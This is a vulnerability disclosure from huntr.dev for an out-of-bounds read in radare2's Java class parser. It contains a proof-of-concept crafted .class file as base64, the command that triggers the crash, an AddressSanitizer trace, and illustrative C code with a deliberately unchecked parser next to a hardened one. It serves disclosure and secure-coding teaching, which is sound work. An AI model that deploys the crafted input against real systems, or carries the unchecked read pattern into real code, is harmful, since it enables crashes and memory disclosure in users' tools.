huntr / bet4it / 229A2E0D-9E5C-402F-9A24-57FA2EB1AAA7
History: Apr 23, 2022 - 3:00 p.m.

Out-of-bounds Read in r_bin_java_constant_value_attr_new function

2022-04-23 15:00:19
bet4it
www.huntr.dev

7.1 High (CVSS3)
  Attack Vector:          LOCAL
  Attack Complexity:      LOW
  Privileges Required:    NONE
  User Interaction:       REQUIRED
  Scope:                  UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact:       NONE
  Availability Impact:    HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

5.8 Medium (CVSS2)
  Access Vector:          NETWORK
  Access Complexity:      MEDIUM
  Authentication:         NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact:       NONE
  Availability Impact:    PARTIAL
  Vector: AV:N/AC:M/Au:N/C:P/I:N/A:P

0.001 Low (EPSS), Percentile 39.6%

  • Description

An out-of-bounds (OOB) read exists in the r_bin_java_constant_value_attr_new function of radare2 5.6.9, the parser for the ConstantValue attribute of a Java class file. The ASan report below shows a 1-byte read immediately to the right of a 7-byte heap region allocated by r_bin_java_get_attr_buf: the attribute buffer handed to the parser is shorter than the fixed-size field the parser reads from it, and the read is not bounded by the buffer's actual size. Opening a crafted .class file (r2 -A, as in the PoC) is enough to trigger it.

This is similar to CVE-2022-0518 and CVE-2022-0521.

  • Version
radare2 5.6.9 27745 @ linux-x86-64 git.conti
commit: 14189710859c27981adb4c2c2aed2863c1859ec5 build: 2022-04-23__11:05:49
  • Proof of Concept
# build the radare2 with address sanitizer
./sys/sanitize.sh

echo yv66vgAAADQADQcACwcADAEADnZpcnR1YWxEYWNoaW5lAQAeKAdMY29tL3N1bi9qZGkvVmlydHVhbE1hY2hpbmU7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAtNaXJyb3IuamF2YQEADUNvbnN0YW50VmFsdWUBABpDVkVfZm91bmRfYnlfZ2l0aHViL2JldDRpdAEAEmNv7S9zdW4vamRpL01pcnJvAQEAEGphdmEvbGFuZy9PYmplY3QGBQABAAIAAAAAAAIEAQADAAQAAAQBEgUABgAAAAIABwAAAAIACAAJAAAAAA== | base64 -d > constant.class
# open the crafted class with analysis; ASan aborts in r_bin_java_constant_value_attr_new
ASAN_OPTIONS=detect_leaks=0:detect_odr_violation=0 r2 -A constant.class
  • ASAN
=================================================================
==608767==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000063cf7 at pc 0x7f99a12e1a71 bp 0x7ffee735f9b0 sp 0x7ffee735f9a0
READ of size 1 at 0x602000063cf7 thread T0
    #0 0x7f99a12e1a70 in r_bin_java_constant_value_attr_new /src/radare2/shlr/java/class.c:3562
    #1 0x7f99a12c9919 in r_bin_java_read_next_attr_from_buffer /src/radare2/shlr/java/class.c:2082
    #2 0x7f99a12c91e5 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2043
    #3 0x7f99a12cd16c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
    #4 0x7f99a12cf25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
    #5 0x7f99a12ce9f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
    #6 0x7f99a12dbbe8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
    #7 0x7f999ae0f8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
    #8 0x7f999ac45989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
    #9 0x7f999ac3a1c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
    #10 0x7f999abf51ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
    #11 0x7f999abf6060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
    #12 0x7f999d0f2edd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
    #13 0x7f999d0f5c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
    #14 0x7f99a60f4c10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
    #15 0x56540c2ff81b in main /src/radare2/binr/radare2/radare2.c:96
    #16 0x7f99a54df30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
    #17 0x7f99a54df3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0)
    #18 0x56540c2ff1a4 in _start (/src/radare2/binr/radare2/radare2+0x21a4)

0x602000063cf7 is located 0 bytes to the right of 7-byte region [0x602000063cf0,0x602000063cf7)
allocated by thread T0 here:
    #0 0x7f99a727afb9 in __interceptor_calloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:154
    #1 0x7f99a12c76a9 in r_bin_java_get_attr_buf /src/radare2/shlr/java/class.c:1963
    #2 0x7f99a12c91a6 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2039
    #3 0x7f99a12cd16c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
    #4 0x7f99a12cf25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
    #5 0x7f99a12ce9f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
    #6 0x7f99a12dbbe8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
    #7 0x7f999ae0f8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
    #8 0x7f999ac45989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
    #9 0x7f999ac3a1c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
    #10 0x7f999abf51ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
    #11 0x7f999abf6060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
    #12 0x7f999d0f2edd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
    #13 0x7f999d0f5c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
    #14 0x7f99a60f4c10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
    #15 0x56540c2ff81b in main /src/radare2/binr/radare2/radare2.c:96
    #16 0x7f99a54df30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /src/radare2/shlr/java/class.c:3562 in r_bin_java_constant_value_attr_new
Shadow bytes around the buggy address:
  0x0c0480004740: fa fa fd fa fa fa fd fa fa fa 05 fa fa fa 00 07
  0x0c0480004750: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 01
  0x0c0480004760: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 03
  0x0c0480004770: fa fa fd fd fa fa 05 fa fa fa 00 04 fa fa fd fd
  0x0c0480004780: fa fa 05 fa fa fa 00 06 fa fa 05 fa fa fa 05 fa
=>0x0c0480004790: fa fa 05 fa fa fa 05 fa fa fa fd fd fa fa[07]fa
  0x0c04800047a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800047b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800047c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800047d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800047e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==608767==ABORTING
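The bug shape the ASan report points at, as an added illustration that is not radare2's code: the 7-byte region allocated by r_bin_java_get_attr_buf matches a 6-byte attribute_info header plus a single byte of info, and r_bin_java_constant_value_attr_new then read a two-byte constantvalue_index starting at offset 6, touching byte 7. The standalone C below reconstructs that pattern with hypothetical names (attr_buf_clamped, parse_constant_value_unchecked, parse_constant_value_checked, parse_from_stream, SAMPLE_ATTR) and a constructed 8-byte ConstantValue attribute: the loader helper clamps the attribute copy to the bytes left in the file, the unchecked parser trusts the header and reads past the clamped copy, and the checked parser bounds the read by the buffer size it was actually given and rejects a declared length that does not fit the attribute format.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Java class-file attribute_info (JVMS 4.7): u2 attribute_name_index,
 * u4 attribute_length, then attribute_length bytes of info. For a
 * ConstantValue attribute the info is exactly one u2: constantvalue_index. */
#define ATTR_HDR_LEN 6u
#define CONSTANT_VALUE_INFO_LEN 2u

struct constant_value_attr {
    uint16_t name_idx;
    uint32_t length;
    uint16_t constantvalue_idx;
};

static uint16_t rd_u16(const uint8_t *p) { return (uint16_t)(((uint16_t)p[0] << 8) | p[1]); }
static uint32_t rd_u32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Hypothetical loader helper: copy one attribute out of the bytes left in the
 * file. Like a loader that refuses to read past EOF, it clamps the copy to
 * `remaining`, so the result can be shorter than 6 + attribute_length.
 * *out_sz is the real size of the copy. Returns NULL if no header fits. */
static uint8_t *attr_buf_clamped(const uint8_t *stream, size_t remaining, size_t *out_sz) {
    if (!stream || !out_sz || remaining < ATTR_HDR_LEN) return NULL;
    size_t declared = rd_u32(stream + 2);
    size_t sz = (declared > remaining - ATTR_HDR_LEN) ? remaining : ATTR_HDR_LEN + declared;
    uint8_t *buf = calloc(1, sz);
    if (!buf) return NULL;
    memcpy(buf, stream, sz);
    *out_sz = sz;
    return buf;
}

/* Vulnerable shape: parse the 6-byte header, then read constantvalue_index
 * without checking that sz covers it. With sz == 7, rd_u16(buf + 6) reads
 * buf[7], one byte past the end of the copy. */
static bool parse_constant_value_unchecked(const uint8_t *buf, size_t sz,
                                           struct constant_value_attr *out) {
    if (sz < ATTR_HDR_LEN) return false;
    out->name_idx = rd_u16(buf);
    out->length = rd_u32(buf + 2);
    out->constantvalue_idx = rd_u16(buf + ATTR_HDR_LEN); /* sz never consulted */
    return true;
}

/* Hardened shape: bound the fixed-size read by the buffer size actually
 * handed in, and reject a declared length that does not match the format. */
static bool parse_constant_value_checked(const uint8_t *buf, size_t sz,
                                         struct constant_value_attr *out) {
    if (!buf || !out || sz < ATTR_HDR_LEN) return false;
    out->name_idx = rd_u16(buf);
    out->length = rd_u32(buf + 2);
    if (out->length != CONSTANT_VALUE_INFO_LEN) return false;     /* malformed */
    if (sz - ATTR_HDR_LEN < CONSTANT_VALUE_INFO_LEN) return false; /* truncated */
    out->constantvalue_idx = rd_u16(buf + ATTR_HDR_LEN);
    return true;
}

/* Run the checked parser over the first `remaining` bytes of a stream.
 * Returns constantvalue_index, or -1 when the attribute is rejected. */
static int parse_from_stream(const uint8_t *stream, size_t remaining) {
    size_t sz = 0;
    uint8_t *buf = attr_buf_clamped(stream, remaining, &sz);
    if (!buf) return -1;
    struct constant_value_attr a;
    bool ok = parse_constant_value_checked(buf, sz, &a);
    free(buf);
    return ok ? (int)a.constantvalue_idx : -1;
}

/* Constructed sample: attribute_name_index 9, attribute_length 2,
 * constantvalue_index 12. Eight bytes in total. */
static const uint8_t SAMPLE_ATTR[] = { 0x00, 0x09, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0C };

/* The unchecked parser accepts a 7-byte view of the attribute. Reading
 * SAMPLE_ATTR[7] stays in bounds here only because the sample array is 8 bytes;
 * on the 7-byte heap copy from attr_buf_clamped it is the overflow ASan reports. */
static bool unchecked_accepts_truncated_view(void) {
    struct constant_value_attr a;
    return parse_constant_value_unchecked(SAMPLE_ATTR, sizeof SAMPLE_ATTR - 1, &a);
}

int main(void) {
    printf("complete attribute:  index %d\n", parse_from_stream(SAMPLE_ATTR, sizeof SAMPLE_ATTR));
    printf("truncated by 1 byte: index %d (rejected)\n", parse_from_stream(SAMPLE_ATTR, sizeof SAMPLE_ATTR - 1));
    printf("unchecked parser on truncated view: %s\n", unchecked_accepts_truncated_view() ? "accepted" : "rejected");
    return 0;
}
```

To reproduce the same class of report on this toy, build with -fsanitize=address and call parse_constant_value_unchecked on the heap copy returned by attr_buf_clamped with remaining set to 7; the demo function deliberately uses the 8-byte sample array instead so the program itself stays in bounds. The checked parser's two tests are independent: the length check catches a class file that lies about the attribute size, and the sz check catches a file that ends early regardless of what the header claims.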
